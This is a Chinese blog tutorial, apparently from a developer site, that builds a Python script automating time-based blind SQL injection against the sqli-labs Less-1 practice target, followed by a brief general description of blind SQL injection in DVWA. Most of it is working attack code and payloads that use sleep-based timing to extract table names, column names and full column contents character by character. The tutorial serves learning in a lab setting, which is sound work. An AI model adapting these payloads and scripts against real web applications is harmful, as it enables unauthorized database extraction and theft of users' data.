python实现自动化延迟注入-时间盲注脚本-源代码

在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注。

靶场:sqlilab的第一关

python包:time、request

下面开始编写:

1、首先我们先写出时间盲注的基础架构

?id=1' and if (A, sleep(3), sleep(0)) --+

如果A语句为真,则页面加载延迟3秒;如果为假,没有延迟。

作为参考我们先提前把数据库信息读取出来,如下:

 表名:emails,referers,uagents,users 

 2、手工的poyload是:

http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( substr((select group_concat(table_name) from information_schema.tables where table_schema = schema()),1,1)  = 'e', sleep(3) , sleep(0))   --+

我们在python中编写如下代码:

chr()函数是python里用来将ascill码转为字符的函数;

dur = 2     #延迟时间
for v in range(1,100):      #假设他由所有表名长度加起来有100,因此要猜解循环100次
    for i in range(32,127): #根据ascill码进行循环,从32-126
        start = time.time()     #起始时间
        fg=requests.get(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if (substr((select group_concat(table_name) "
                        f"from information_schema.tables where table_schema = schema()),{v},1) = '{chr(i)}', "
                        f"sleep({dur}) , sleep(0)) --+ ")
        end = time.time()-start     #poyload提交后花费的时间
        if end > dur:   #如果发生延迟,猜解正确,输出该字符串
            print(f'{chr(i)}',end='')
            break       #用于跳出猜字符串的这个循环,进行第二个字符串的猜解

运行后,读取出了数据库中的表:

但由于循环次数设置的太多,表名其实并没有那么长,因此,我们在猜表名之前先确定表明的长度;这里所有的表为大写是因为MySQL数据库大小写都可以识别,不影响。

3、接下来进行改进,首先我们写一个函数用于确定是否发生时间延迟;

def req(urls):
    start = time.time()  # 起始时间
    fg = requests.get(url=urls)
    end = time.time() - start  # poyload提交后花费的时间
    if end > dur:  # 如果发生延迟,返回True,否则返回False
        return True
    else:
        return False

4、然后我们编写判断表长度的部分

 手工的poyload是:

http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat(table_name) from information_schema.tables where table_schema = schema()))  = 10, sleep(3) , sleep(0))   --+

根据这个我们编写代码:

#进行表名长度的确定
for i in range(1,300):
    fg = req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat(table_name) from "
             f"information_schema.tables where table_schema = schema()))  = {i}, sleep({dur}) , sleep(0))   --+")
    if fg:
        print(f'表的长度是:{i}')
        length_table = i
        break

 

 5、获得表的长度,接下来猜表名的时候只需要循环29次

重改获取表名的代码:

#进行表名的猜解
tmp = ''
for v in range(1, length_table + 1):
    for i in range(32,127): #根据ascill码进行循环,从32-126
        fg=req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if (substr((select group_concat(table_name) "
                        f"from information_schema.tables where table_schema = schema()),{v},1) = '{chr(i)}', "
                        f"sleep({dur}) , sleep(0)) --+ ")
        if fg:
            tmp += chr(i)
            break
print(f'表名:{tmp}')

 运行结果:

5、接下来是猜解列名,因此我们要指定表名;现在表名是以字符串的形式存在,因此用列表存放,等会用下标来指定表名。还是分两步,先确定列的长度,再确定列名

(1)、列的长度

poyload:

http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat(column_name) from information_schema.columns where table_schema = 'users'))  = 10, sleep(3) , sleep(0))   --+

代码如下:

#1、判断列的长度
tables = []     #用于存放表名
tables = tmp.split(',')
ind = 0         #用于指定表名
for x in tables:
    print(f'{ind}:{x}')
    ind += 1
tb = int(input('请选择要爆破的表'))

for i in range(1,300):
    fg = req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat(column_name) from "
             f"information_schema.columns where table_name = '{tables[tb]}'))  = {i}, sleep({dur}) , sleep(0))   --+")
    if fg:
        print(f'{tables[tb]}的列的长度是:{i}')
        length_column = i
        break

运行结果:

(2)、猜解列名

poyload:

http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( substr((select group_concat(column_name) from information_schema.columns where table_schema = 'users'),1,1)  = 'i', sleep(3) , sleep(0))   --+

代码如下:

#2、猜解列名
tmp_column = ''
for v in range(1, length_column + 1):
    for i in range(32,127): #根据ascill码进行循环,从32-126
        fg=req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if (substr((select group_concat(column_name) "
                        f"from information_schema.columns where table_name = '{tables[tb]}'),{v},1) = '{chr(i)}', "
                        f"sleep({dur}) , sleep(0)) --+ ")
        if fg:
            tmp_column += chr(i)
            break
print(f'{tables[tb]}的列名:{tmp_column}')

运行结果: 

6、指定列名,猜解该列的所有内容

代码如下:

#指定列名,获取数据
#1、判断该列所有内容的长度
tables_column = []     #用于存放表名
tables_column = tmp_column.split(',')
ind = 0         #用于指定表名
for x in tables_column:
    print(f'{ind}:{x}')
    ind += 1
ts = int(input('请选择要爆破的列名'))
for i in range(1,10000):
    fg = req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( length((select group_concat({tables_column[ts]}) from '{tables[tb]}'))  = {i}, sleep({dur}) , sleep(0)) --+")
    if fg:
        print(f'{tables[tb]}的{tables_column[ts]}列的所有内容长度是:{i}')
        length_content = i
        break

#2、获取该列的所有内容
tmp_content = ''
for v in range(1, length_content + 1):
    for i in range(32,127): #根据ascill码进行循环,从32-126
        fg=req(f"http://192.168.162.135/sqlilab/Less-1/?id=1' and if ( substr((select group_concat"
               f"({tables_column[ts]}) from '{tables[tb]}'),{v},1)  = '{chr(i)}', sleep({dur}) , sleep(0)) --+")
        if fg:
            tmp_content += chr(i)
            break
print(f'{tables[tb]}表的{tables_column[ts]}列的内容')
tables_content = []     #存放列的内容
tables_content = tmp_content.split(',')
for n in tables_content:
    print(n)

到此,整个项目编写完成!!!

欢迎大佬们的指正。

  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA(Damn Vulnerable Web Application)是一个用于练习 Web 安全技术的漏洞应用程序。其中包含了多个不同类型的漏洞,包括 SQL 盲注。 SQL 盲注是一种利用 Web 应用程序中存在的 SQL 注入漏洞来获取数据库信息的攻击技术。在 DVWA 中,你可以通过以下步骤进行 SQL 盲注的高级练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以是登录表单、搜索框或其他用户输入的地方。 3. 确定数据库和表名:使用不正确的输入来尝试触发错误,并尝试从错误消息中获取有关数据库和表名的信息。这可以帮助你构建有效的注入语句。 4. 构造注入语句:根据你获取到的数据库和表名信息,构造有效的注入语句。在高级盲注中,你可能需要使用一些技巧来绕过过滤和限制。 5. 判断注入结果:通过观察应用程序的响应,判断你的注入语句是否成功执行。你可以观察页面内容、错误消息或应用程序的行为变化。 6. 提取数据:如果注入成功执行,你可以使用 UNION SELECT 或其他技术来提取数据库中的数据。通过逐渐调整注入语句,你可以获取更多敏感信息。 请注意,在进行 DVWA 或任何其他漏洞练习时,遵守法律和道德规范。仅在授权的环境中进行测试,不要攻击未经授权的系统。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值